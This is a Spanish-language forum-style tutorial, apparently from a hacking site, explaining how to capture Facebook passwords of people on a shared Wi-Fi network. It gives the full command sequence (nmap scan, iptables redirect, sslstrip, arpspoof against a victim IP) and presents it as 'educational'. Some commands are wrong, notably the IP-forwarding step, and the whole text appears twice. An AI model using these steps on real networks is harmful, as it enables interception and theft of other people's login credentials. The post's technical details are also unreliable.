La mayoria de la gente le gusta gozar de las cosas gratuitas o robadas, es por ello que en cuanto tengan la oportunidad se conectan a cualquier red que este a su alcance...y para que? PARA CONECTARSE AL FACEBOOK su peor error.... tener en cuenta que los administradores de redes suelen tender trampas....por lo que hay que tener cuidado..
Les esplicare lo facil que es robarles su contraseña....
Esto es con fines educativos....
Definiciones de Conceptos utilizados:
Antes que nada veamos algunas pequeñas definiciones de ciertos temas y conceptos necesarios para la comprencion del post.
SSL:
Su acronimo significa Secure Sockets Layer (capas de enchufes seguros) el cual es un protocolo que es utilizado para crear conexiones seguras de servidor a cliente en http y https encriptando los datos de los usuarios que navengan por internet por medio de certificados digitales RSA proporcionados por la empresa Verising .
Ataques Man in the middle
Es un ataque en el que el enemigo adquiere la capacidad de leer, insertar y modificar a voluntad, los mensajes entre dos partes sin que ninguna de ellas conozca que el enlace entre ellos ha sido violado.
SSLSTRIP
Es una herramienta que nos permite suplantar los certificados de ssl y redireccionar el trafico de http y https hacia nuestro equipo para ver datos como logins y passwords cifrados por ssl en paginas web.
Herramientas necesarias.
*nmap: podemos obtenerlo haciendo click AQUÌ ó instalarlo con Código:
sudo apt-get install nmap
*Dsniff: Obtenlo AQUÌ ó Código: sudo apt-get install dsniff
Python y dependencias de él para sslstrip: por lo general las distros de linux ya traen python solo queda instalar las dependencias con Código: sudo apt-get install python-twisted-web
Y si no tienen python Código: sudo apt-get install python
*Sslstrip Lo descargamos de AQUÌ
lo descomprimimos y tipeamos en la consolapara instalarlo ya con el directorio de la carpeta d sslstrip :
Código: sudo python ./setup.py install
Bien!
Paso 1: checamos nuestra ip y mapeamos la red con nmap para identificar el router y la victima:
chekamos la ip con Código: ifconfig
Mapeamos la red con rango 0-255 para que capture todas las maquinas presentes en la red:
Código: sudo nmap -PN 192.168.0.0-255
Paso 2: Activamos el forwarding para reenvio de paquetes pues al hacer el Mitm dejariamos sin conexion a la victima es por eso que se activa.
Se activa con: cat /proc/sys/net/ipv4/ip_forward
Y para comprobar que esta activado "1" ponemos en la consola:
cat /proc/sys/net/ipv4/ip_forward=1
Veamos
Paso 3 : Redireccionamos el trafico de http y https a un puerto a la escucha con:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Paso 4: Ponemos en marcha el sslstrip con: sudo sslstrip -w HxC - l 8080
Nota: -w aqui va el nombre con que quieren que se guarde el log del sslstrip y -l es para que escuche el trafico del puerto al cual redireccionamos el trafico de http
Paso 5 Hacemos un envenenamiento de arp o arpspoof con: arpspoof -i interface de red (wlan0 o etho) -t ip victima ip del router
vean:
en mi caso la ip victima es 192.168.0.2 y la del router es 192.168.0.1
Ahora solo queda esperar a que alguen caiga
miren:
aqui en la maquina virtual con win xp estamos entrando en Facebook
y luego que ya entramos a FB
Vean que registra el sslstrip en el archivo de texto que crea por default:
Ahora comentamos un enlace de alguien miren:
Como pueden ver con Sslstrip podemos obtener passwords sin levantar sospechas como lo hariamos con ettercap por si solo, y tambien podemos ver lo que publicamos en enlaces etc etc ...
Funciona igual cuando alguien se conecta con un dispositivo movil...
Ahora si.... lo pensaran 2 veces al conectarse a alguna red libre!?
Saludos.
Les esplicare lo facil que es robarles su contraseña....
Esto es con fines educativos....
Definiciones de Conceptos utilizados:
Antes que nada veamos algunas pequeñas definiciones de ciertos temas y conceptos necesarios para la comprencion del post.
SSL:
Su acronimo significa Secure Sockets Layer (capas de enchufes seguros) el cual es un protocolo que es utilizado para crear conexiones seguras de servidor a cliente en http y https encriptando los datos de los usuarios que navengan por internet por medio de certificados digitales RSA proporcionados por la empresa Verising .
Ataques Man in the middle
Es un ataque en el que el enemigo adquiere la capacidad de leer, insertar y modificar a voluntad, los mensajes entre dos partes sin que ninguna de ellas conozca que el enlace entre ellos ha sido violado.
SSLSTRIP
Es una herramienta que nos permite suplantar los certificados de ssl y redireccionar el trafico de http y https hacia nuestro equipo para ver datos como logins y passwords cifrados por ssl en paginas web.
Herramientas necesarias.
*nmap: podemos obtenerlo haciendo click AQUÌ ó instalarlo con Código:
sudo apt-get install nmap
*Dsniff: Obtenlo AQUÌ ó Código: sudo apt-get install dsniff
Python y dependencias de él para sslstrip: por lo general las distros de linux ya traen python solo queda instalar las dependencias con Código: sudo apt-get install python-twisted-web
Y si no tienen python Código: sudo apt-get install python
*Sslstrip Lo descargamos de AQUÌ
lo descomprimimos y tipeamos en la consolapara instalarlo ya con el directorio de la carpeta d sslstrip :
Código: sudo python ./setup.py install
Bien!
Paso 1: checamos nuestra ip y mapeamos la red con nmap para identificar el router y la victima:
chekamos la ip con Código: ifconfig
Mapeamos la red con rango 0-255 para que capture todas las maquinas presentes en la red:
Código: sudo nmap -PN 192.168.0.0-255
Paso 2: Activamos el forwarding para reenvio de paquetes pues al hacer el Mitm dejariamos sin conexion a la victima es por eso que se activa.
Se activa con: cat /proc/sys/net/ipv4/ip_forward
Y para comprobar que esta activado "1" ponemos en la consola:
cat /proc/sys/net/ipv4/ip_forward=1
Veamos
Paso 3 : Redireccionamos el trafico de http y https a un puerto a la escucha con:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Paso 4: Ponemos en marcha el sslstrip con: sudo sslstrip -w HxC - l 8080
Nota: -w aqui va el nombre con que quieren que se guarde el log del sslstrip y -l es para que escuche el trafico del puerto al cual redireccionamos el trafico de http
Paso 5 Hacemos un envenenamiento de arp o arpspoof con: arpspoof -i interface de red (wlan0 o etho) -t ip victima ip del router
vean:
en mi caso la ip victima es 192.168.0.2 y la del router es 192.168.0.1
Ahora solo queda esperar a que alguen caiga
miren:
aqui en la maquina virtual con win xp estamos entrando en Facebook
y luego que ya entramos a FB
Vean que registra el sslstrip en el archivo de texto que crea por default:
Ahora comentamos un enlace de alguien miren:
Como pueden ver con Sslstrip podemos obtener passwords sin levantar sospechas como lo hariamos con ettercap por si solo, y tambien podemos ver lo que publicamos en enlaces etc etc ...
Funciona igual cuando alguien se conecta con un dispositivo movil...
Ahora si.... lo pensaran 2 veces al conectarse a alguna red libre!?
Saludos.